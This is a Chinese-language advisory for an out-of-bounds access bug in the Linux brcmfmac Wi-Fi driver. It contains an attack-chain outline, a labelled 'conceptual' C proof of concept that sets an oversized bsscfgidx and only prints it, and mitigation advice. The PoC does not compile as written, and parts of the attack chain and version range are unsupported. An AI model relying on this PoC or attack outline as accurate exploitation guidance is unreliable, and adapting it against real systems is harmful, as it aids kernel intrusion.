CVE-2026-43110 CVSS 8.8 高危

Linux内核brcmfmac驱动越界访问漏洞(CVE-2026-43110)

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43110

漏洞类型

内存越界访问

CVSS评分

8.8 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的brcmfmac驱动程序在处理接口（IF）事件时存在安全漏洞。该驱动在验证固件提供的接口索引时，未对bsscfgidx字段进行充分的边界检查。攻击者可以通过发送特制的固件事件，利用该漏洞导致越界访问内存，可能引发内核崩溃或权限提升。

技术细节

漏洞存在于`wifi: brcmfmac`模块的`brcmf_fweh_handle_if_event`函数中。虽然该函数检查了固件提供的接口索引以确保其在有效范围内，但在使用`bsscfgidx`字段作为数组索引访问`drvr->iflist[]`之前，并未对该字段进行匹配的范围检查。如果固件提供了一个超出`drvr->iflist`数组大小的`bsscfgidx`值，将导致越界读取或写入。由于攻击向量为邻接（AV:A）且无需认证（PR:N），攻击者位于同一局域网内即可利用此漏洞，造成高机密性、完整性和可用性影响。

攻击链分析

STEP 1

1. 侦察

攻击者确认目标系统使用带有brcmfmac驱动程序的Linux内核，且处于可访问的邻接网络中（如Wi-Fi覆盖范围）。

STEP 2

2. 构造恶意数据

攻击者构造一个特制的固件事件（IF event），其中包含一个合法的ifidx，但设置一个越界的bsscfgidx值（例如大于接口列表最大长度的值）。

STEP 3

3. 发送攻击载荷

通过无线接口向目标系统发送该恶意事件帧。

STEP 4

4. 触发漏洞

brcmfmac驱动的brcmf_fweh_handle_if_event函数接收事件，使用未检查的bsscfgidx访问drvr->iflist数组，导致越界内存访问。

STEP 5

5. 实现影响

越界访问可能导致内核恐慌（DoS），或在特定条件下实现内存读写，进而导致权限提升或信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-43110
 * This code simulates sending a malformed firmware event to trigger
 * the missing bsscfgidx validation in brcmf_fweh_handle_if_event.
 * Note: Actual exploitation requires interaction with the vulnerable driver.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// Mock structure representing the firmware event header
struct brcmf_event_msg {
    __u16 version;
    __u16 flags;
    __u32 event_type;
    __u32 status;
    __u32 reason;
    __u8 ifidx;       // Validated index
    __u8 bsscfgidx;   // The vulnerable field (missing validation)
    __u8 addr[ETH_ALEN];
    char ifname[IFNAMSIZ];
};

void trigger_vulnerability() {
    struct brcmf_event_msg malicious_event;
    memset(&malicious_event, 0, sizeof(malicious_event));

    // Setup normal fields
    malicious_event.version = 1;
    malicious_event.ifidx = 0; // Valid interface index
    
    // Set bsscfgidx to a value likely outside the bounds of drvr->iflist[]
    // Assuming drvr->iflist has a small size (e.g., < 255)
    malicious_event.bsscfgidx = 0xFF; 

    printf("Sending malicious event with bsscfgidx: %d\n", malicious_event.bsscfgidx);
    
    // In a real scenario, this would be passed to the driver via ioctl or firmware interaction
    // brcmf_fweh_handle_if_event(drvr, &malicious_event, ...);
    // This would cause drvr->iflist[0xFF] access -> Out of Bounds
}

int main() {
    trigger_vulnerability();
    return 0;
}

影响范围

Linux Kernel < 6.1 (未包含补丁的版本)

Linux Kernel 6.x (特定提交前版本)

防御指南

临时缓解措施

由于该漏洞需要相邻网络访问权限，最有效的临时缓解措施是严格管控Wi-Fi网络的访问权限，确保只信任的设备能够连接。此外，可以通过内核模块黑名单机制禁用brcmfmac驱动，直到系统升级到修复版本。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表